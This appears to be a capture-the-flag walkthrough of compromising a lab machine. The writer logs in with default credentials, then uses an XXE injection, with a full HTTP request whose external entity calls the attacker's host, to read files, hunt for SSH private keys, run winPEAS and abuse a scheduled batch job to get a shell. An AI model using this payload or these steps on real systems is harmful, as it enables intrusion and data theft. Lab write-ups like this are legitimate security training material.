After going back to login page, I tried a few default credentials and one trivial combination worked.
And then I found this simple XXE:
Request code:
POST /process.php HTTP/1.1
Host: 10.129.95.192
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/xml
Content-Length: 197
Origin: http://10.129.95.192
Connection: close
Referer: http://10.129.95.192/services.php
Cookie: PHPSESSID=ha5v7v3on5641j741b5pf9nheb
<?xml version = "1.0"?>
<!DOCTYPE order [
<!ENTITY xxe SYSTEM "http://10.10.14.25:8000/funny.txt">]>
<order>
&xxe;
<quantity>
1
</quantity><item>Groceries</item><address>'`</address></order>XXE resources:
https://portswigger.net/web-security/xxe/
https://portswigger.net/web-security/xxe/blind
https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity
If a correct request is sent, I can not see the output
I was struggling a little bit (especially with “/” and “\”). After I figured out the correct syntax I found this:
Now I can enumerate whole system and read files, but it would be really time consuming. I went back to check webserver to get some information about the site.
SSH service is online, so I checked presence of ssh private key:
Switched to PowerShell and run winPEAS
Probably AV blocked winPEAS, so I started to check system manually
We can see process of wevtutil which was mentioned inside job.bat. If we consider the name of file, it may be a scheduled task to run this file.
After a few seconds I received a shell.
